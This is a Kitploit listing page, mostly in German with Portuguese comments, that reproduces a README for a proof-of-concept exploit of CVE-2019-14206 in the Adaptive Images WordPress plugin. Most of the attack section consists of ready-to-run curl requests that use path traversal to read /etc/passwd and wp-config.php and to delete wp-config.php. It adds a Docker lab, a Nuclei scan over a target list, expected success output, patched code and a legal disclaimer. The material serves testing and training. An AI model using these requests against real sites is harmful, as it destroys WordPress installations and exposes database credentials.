Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2019-14206-poc — Proof-of-Concept-Exploit für CVE-2019-14206, der die Löschung beliebiger Dateien im Adaptive Images WordPress-Plugin demonstriert. Enthält Docker-Labor, Nuclei-Vorlage und manuelle Testskripte für Sicherheitsschulung und Validierung. | Kitploit
Tools/GitHubGitHub/developerfred/cve-2019-14206-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

Proof-of-Concept-Exploit für CVE-2019-14206, der die Löschung beliebiger Dateien im Adaptive Images WordPress-Plugin demonstriert. Enthält Docker-Labor, Nuclei-Vorlage und manuelle Testskripte für Sicherheitsschulung und Validierung.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-14206 - Adaptive Images for WordPress Arbitrary File Deletion

📋 Inhaltsverzeichnis

  1. Über die Schwachstelle
  2. Voraussetzungen
  3. Installation
  4. Testmethoden
    • Schnelltest
    • Vollständiger Test mit Docker
    • Test mit Nuclei
    • Manueller Test
  5. Ergebnisse interpretieren
  6. Bereinigung
  7. Fehlerbehebung
  8. Mitigation
  9. Rechtlicher Hinweis

🎯 Über die Schwachstelle

CVE-ID: CVE-2019-14206
Severity: Hoch (CVSS 6.5)
Betroffenes Plugin: Adaptive Images for WordPress
Betroffene Versionen: < 0.6.67

Was ermöglicht diese Schwachstelle?

Diese Schwachstelle ermöglicht es einem entfernten, nicht authentifizierten Angreifer, beliebige Dateien auf dem WordPress-Server zu löschen, indem er das Plugin Adaptive Images ausnutzt.

Reale Auswirkungen:

  • ❌ Löschung von wp-config.php, was einen vollständigen Ausfall der Website verursacht
  • ❌ Offenlegung von Datenbank-Anmeldedaten über LFI
  • ⚠️ Angriffskette, die zu RCE (Remote Code Execution) führt
  • 🔴 Vollständige Kompromittierung der WordPress-Website

Grundursache:

root@kitploit:~
// O plugin usa input do usuário SEM sanitização
$settings = $_REQUEST['adaptive-images-settings'];

// Constrói caminho de arquivo com parâmetros controlados pelo atacante
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// DELETA arquivo arbitrário
unlink($cache_file);

💻 Voraussetzungen

Mindestanforderungen:

  • Betriebssystem: macOS, Linux oder Windows
  • Nuclei: Version 3.0 oder höher (Installieren)
  • Bash: Version 4.0 oder höher
  • curl: Für manuelle Tests
  • PHP: Version 7.0+ (optional, für Tests mit integriertem Server)

Voraussetzungen überprüfen:

root@kitploit:~
# Verificar Nuclei
nuclei --version

# Verificar Bash
bash --version

# Verificar curl
curl --version

# Verificar PHP (opcional)
php --version 2>/dev/null || echo "PHP não disponível (opcional)"

🚀 Installation

Schritt 1: Dateien klonen oder herunterladen

root@kitploit:~
# Se estiver no diretório nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# Ou baixe os arquivos necessários
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

Schritt 2: Dateistruktur überprüfen

root@kitploit:~
# Verificar se os arquivos existem
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

Schritt 3: Skripte ausführbar machen

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

🧪 Testmethoden

1. Schnelltest ⏱️ 2 Minuten

Führen Sie die vollständige Demonstration aus, die den gesamten Exploit simuliert:

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

Was passiert:

  • Erstellt eine vollständige Testumgebung
  • Simuliert die Schwachstelle
  • Demonstriert die Dateilöschung
  • Validiert das Nuclei-Template

Erwartete Ausgabe:

root@kitploit:~
[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready

2. Vollständiger Test mit Docker 🐳 10 Minuten

Schritt 1: Docker-Umgebung starten

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# Se Docker estiver rodando
docker-compose up -d

# Se Docker NÃO estiver rodando, use o simulador
./docker-test-full.sh

Schritt 2: WordPress aufrufen

root@kitploit:~
# O ambiente estará disponível em
# http://localhost:8888

Schritt 3: Verwundbares Plugin überprüfen

root@kitploit:~
# Verificar se o script vulnerable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

Schritt 4: Tests ausführen

root@kitploit:~
# Teste LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Teste File Deletion
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. Test mit Nuclei 🎯 5 Minuten

Schritt 1: Zielliste vorbereiten

root@kitploit:~
# Criar arquivo de alvos
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

Schritt 2: Scan ausführen

root@kitploit:~
# Scan básico
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# Scan detalhado
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# Scan com debug (OBRIGATÓRIO para bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# Salvar resultados
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

Schritt 3: Ergebnisse interpretieren

root@kitploit:~
# Ver resultados
cat results.txt

# Resultados positivos terão:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. Manueller Test 🔧 10 Minuten

Schritt 1: PHP-Server starten

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

Schritt 2: LFI testen (Dateilesen)

root@kitploit:~
# Tentar ler /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Tentar ler wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

Erwartetes Ergebnis (LFI):

root@kitploit:~
=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

Schritt 3: Dateilöschung testen

root@kitploit:~
# Verificar se wp-config.php existe ANTES
ls -la wp-config.php

# Executar exploit
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado DEPOIS
ls -la wp-config.php

Erwartetes Ergebnis (Dateilöschung):

root@kitploit:~
[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

📊 Ergebnisse interpretieren

Positives Ergebnis (verwundbar):

root@kitploit:~
[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

Negatives Ergebnis (nicht verwundbar):

root@kitploit:~
[N/A] No results found

Mögliche Gründe für falsch-negative Ergebnisse:

  • ✅ Plugin nicht installiert
  • ✅ Plugin aktualisiert (Version >= 0.6.67)
  • ✅ WAF blockiert Anfragen
  • ✅ Server antwortet nicht auf den erwarteten Pfaden

🧹 Bereinigung

Testumgebung bereinigen:

root@kitploit:~
# Remover ambiente Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# Remover arquivos de teste
rm -rf docker-test/
rm -f targets.txt results.txt

# Restaurar wp-config.php se foi deletado
cat > wp-config.php << 'EOF'
<?php
// Arquivo restaurado
define('DB_NAME', 'wordpress');
EOF

Nuclei bereinigen:

root@kitploit:~
# Remover resultados de scan
rm -f results.txt

# Limpar cache (opcional)
nuclei -rm-cache

🔧 Fehlerbehebung

Problem 1: Nuclei nicht gefunden

root@kitploit:~
# Instalar Nuclei
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Ou baixar binário
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.0.0/nuclei-linux-amd64.zip
unzip nuclei-linux-amd64.zip
chmod +x nuclei
sudo mv nuclei /usr/local/bin/

Problem 2: Template lädt nicht

root@kitploit:~
# Verificar se arquivo existe
ls -la http/cves/2019/CVE-2019-14206.yaml

# Verificar sintaxe YAML
python3 -c "import yaml; yaml.safe_load(open('http/cves/2019/CVE-2019-14206.yaml'))"

# Usar caminho absoluto
nuclei -t /Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml -u http://target

Problem 3: PHP-Server startet nicht

root@kitploit:~
# Verificar porta
lsof -i :8888

# Usar porta diferente
php -S localhost:9999

# Verificar PHP instalado
which php
php --version

Problem 4: Docker läuft nicht

root@kitploit:~
# Verificar status Docker
docker ps

# Iniciar Docker
# No macOS: Abrir Docker Desktop
# No Linux: sudo systemctl start docker

# Usar modo simulador (funciona sem Docker)
./docker-test-full.sh

🛡️ Mitigation

Sofortiger Schutz:

  1. Plugin aktualisieren:

    root@kitploit:~
    Painel WordPress > Plugins > Atualizar Adaptive Images
    
  2. Sichere Version: >= 0.6.67

  3. Verwundbares Plugin entfernen:

    root@kitploit:~
    rm -rf wp-content/plugins/adaptive-images/
    

Schutz im Code (für Entwickler):

root@kitploit:~
// ✅ CÓDIGO SEGURO (Exemplo de correção)
function adaptive_images_script_get_settings() {
    // Sanitizar input
    $allowed_keys = ['cache_dir', 'resolution', 'request_uri'];
    $settings = [];
    
    foreach ($allowed_keys as $key) {
        if (isset($_REQUEST['adaptive-images-settings'][$key])) {
            $settings[$key] = sanitize_text_field($_REQUEST['adaptive-images-settings'][$key]);
        }
    }
    
    return $settings;
}

function adaptive_images_delete_stale_cache_image($source_file, $cache_file, $resolution) {
    // Validar caminhos
    $allowed_cache_dirs = ['ai-cache', 'adaptive-cache'];
    $cache_dir = basename(dirname($cache_file));
    
    if (!in_array($cache_dir, $allowed_cache_dirs)) {
        return false; // Recusar caminhos inválidos
    }
    
    // Usar caminhos absolutos validados
    $cache_file = WP_CONTENT_DIR . '/ai-cache/' . basename($cache_file);
    
    if (file_exists($cache_file)) {
        unlink($cache_file);
    }
}

⚠️ Rechtlicher Hinweis

Nutzungsbedingungen:

Dieses Material wird ausschließlich für Bildungs- und Sicherheitstestzwecke bereitgestellt.

Was Sie TUN DÜRFEN:

  • ✅ Systeme testen, die Ihnen gehören
  • ✅ In Laborumgebungen verwenden
  • ✅ Über Webschwachstellen lernen
  • ✅ Zur Open-Source-Sicherheit beitragen
  • ✅ Eigene Anwendungen testen

Was Sie NICHT TUN DÜRFEN:

  • ❌ Systeme ohne Genehmigung testen
  • ❌ Schäden oder Unterbrechungen verursachen
  • ❌ Für böswillige Zwecke verwenden
  • ❌ Exploits verkaufen oder verbreiten
  • ❌ Informationen über verwundbare Systeme veröffentlichen

Verantwortung:

Der Autor und die Mitwirkenden übernehmen keinerlei Verantwortung für:

  • Unsachgemäße Verwendung dieses Materials
  • Schäden an Systemen
  • Datenverluste
  • Dienstunterbrechungen
  • Rechtliche Probleme

Verantwortungsvolle Offenlegung:

Wenn Sie diese Schwachstelle in realen Systemen entdecken:

  1. NICHT ausnutzen oder Schäden verursachen
  2. DOKUMENTIEREN Sie die Schwachstelle
  3. BENACHRICHTIGEN Sie den Verantwortlichen des Systems
  4. BEFOLGEN Sie die Richtlinien zur verantwortungsvollen Offenlegung (Responsible Disclosure)

📚 Zusätzliche Ressourcen

Referenzen:

  • NVD - CVE-2019-14206
  • Original-Forschung
  • Offizielles Plugin
  • WPScan-Eintrag

Verwandte Werkzeuge:

  • Nuclei
  • nuclei-templates
  • WPScan
  • Wordfence

🎓 Lernerfahrungen

Dieses Projekt zeigt:

  1. Eingabevalidierung: Die Bedeutung der Bereinigung aller Benutzereingaben
  2. Path Traversal: Wie Dateipfade manipuliert werden können
  3. Dateioperationen: Die Risiken von Funktionen wie unlink() mit Benutzereingaben
  4. Plugin-Sicherheit: Häufige Schwachstellen in WordPress-Plugins
  5. CVE-Analyse: Wie Schwachstellen analysiert und reproduziert werden
  6. Erkennungsentwicklung: Wie effektive Erkennungs-Templates erstellt werden

📝 Changelog

Version 1.0.0 (2026-01-04)

  • ✅ Nuclei-Template erstellt
  • ✅ Vollständige PoC-Umgebung
  • ✅ Vollständige Dokumentation
  • ✅ Testskripte validiert
  • ✅ Funktionierende Demonstration

🤝 Mitwirkung

Beiträge sind willkommen! So können Sie beitragen:

  1. Forken Sie das Repository
  2. Erstellen Sie einen Branch (git checkout -b feature/improvement)
  3. Committen Sie Ihre Änderungen (git commit -am 'Add improvement')
  4. Pushen Sie den Branch (git push origin feature/improvement)
  5. Erstellen Sie einen Pull Request

📧 Support

Bei Fragen oder Problemen:

  1. Überprüfen Sie den Abschnitt Fehlerbehebung
  2. Überprüfen Sie die Issues des Repositorys
  3. Dokumentieren Sie das Problem mit:
    • Betriebssystem
    • Nuclei-Version
    • PHP-Version (falls zutreffend)
    • Vollständige Fehlermeldung
    • Schritte zur Reproduktion

🎉 Vielen Dank, dass Sie dieses Testmaterial verwenden!

Denken Sie daran: Mit großer Macht kommt große Verantwortung. Nutzen Sie dieses Wissen, um das Internet sicherer zu machen, nicht verwundbarer.


Erstellt: 4. Januar 2026
Version: 1.0.0
Status: ✅ Bereit für den Produktionseinsatz

Tool herunterladen